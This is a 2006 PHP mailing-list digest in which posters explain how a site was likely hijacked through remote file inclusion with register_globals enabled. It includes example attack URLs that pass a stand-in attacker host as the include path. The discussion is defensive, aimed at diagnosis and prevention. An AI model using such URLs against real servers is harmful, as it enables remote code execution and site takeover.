php-general Digest 14 Nov 2006 06:16:51 - Issue 4458
Topics (messages 244561 through 244583):
Re: Highjack?
244561 by: Matt Carlson
244562 by: Rory Browne
244563 by: bruce
Re: How do you do the ? mark after a filename
244564 by: Norbert Ehart
Scrolling text
244565 by: Alain Roger
244566 by: Robert Cummings
Re: one click - two actions?
244567 by: Mel
244569 by: Warren Vail
244571 by: Mel
244577 by: Warren Vail
Problem with PHP 5.2.0
244568 by: bluefx13.gmail.com
244580 by: Kevin Waterson
Re: Mysql strategy
244570 by: David Tulloh
244572 by: Robert Cummings
244578 by: Chris
244579 by: Larry Garfield
Compressing both php and linked css files with ob_gzhandler and htaccess
244573 by: Graham Anderson
244574 by: Jochem Maas
244575 by: Graham Anderson
244576 by: Graham Anderson
Re: server side security
244581 by: Chris
244582 by: Ligaya A. Turmelle
Re: problem with php[4,5] (horde 2/3)
244583 by: Chris
Administrivia:
To subscribe to the digest, e-mail:
[EMAIL PROTECTED]
To unsubscribe from the digest, e-mail:
[EMAIL PROTECTED]
To post to the list, e-mail:
php-general@lists.php.net
--
---BeginMessage---
With register_globals on, the globals super array ($_POST, $_GET, $_REQUEST)
are automatically populated into variables. With that in mind
www.example.com/index.php?path=remoteexplot.com/ would then yield
include('remoteexplit.com/foo'); thus including ANY code they wish.
- Original Message
From: bruce [EMAIL PROTECTED]
To: Eric Butera [EMAIL PROTECTED]; tedd [EMAIL PROTECTED]
Cc: PHP General List php-general@lists.php.net
Sent: Monday, November 13, 2006 11:55:13 AM
Subject: RE: [PHP] Highjack?
eric...
you say how embarrasing regaring the $path.'foo' i'm curious, why/how is
this simple piece of code exploitable. assuming $path is not something that
comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...
thoughts/explanations...
thanks
-Original Message-
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP] Highjack?
On 11/13/06, tedd [EMAIL PROTECTED] wrote:
Hi gang:
While this is not an obvious php question, it does deal with security
which is a concern.
Just this morning had a couple of my sites highjacked. What I found
was someone had replaced my root level index.php with their own
index.php. You can see the result at:
http://xn--u2g.com/index1.php
It was not a terrible loss nor inconvenience, but I wonder how they
did it. Any ideas how this was done and suggestions as to how to
prevent this from happening again?
Thanks,
tedd
--
---
http://sperling.com http://ancientstones.com http://earthstones.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Tedd,
I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project. I'd say the first thing would be to try and
find any include/require statements that are exploitable. In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.
If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
---End Message---
---BeginMessage---
-- Forwarded message --
From: Rory Browne [EMAIL PROTECTED]
Date: Nov 13, 2006 7:12 PM
Subject: Re: [PHP] Highjack?
To: [EMAIL PROTECTED]
On 11/13/06, bruce [EMAIL PROTECTED] wrote:
eric...
you say how embarrasing regaring the $path.'foo' i'm curious, why/how
is
this simple piece of code exploitable. assuming $path is not something
that
comes via the url vars (GET/POST/REQUEST)
If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=
The script will then include
http://www.badserver.com/badscript.txt?dummy=script.php
it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...
thoughts/explanations...
thanks
-Original Message-
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP]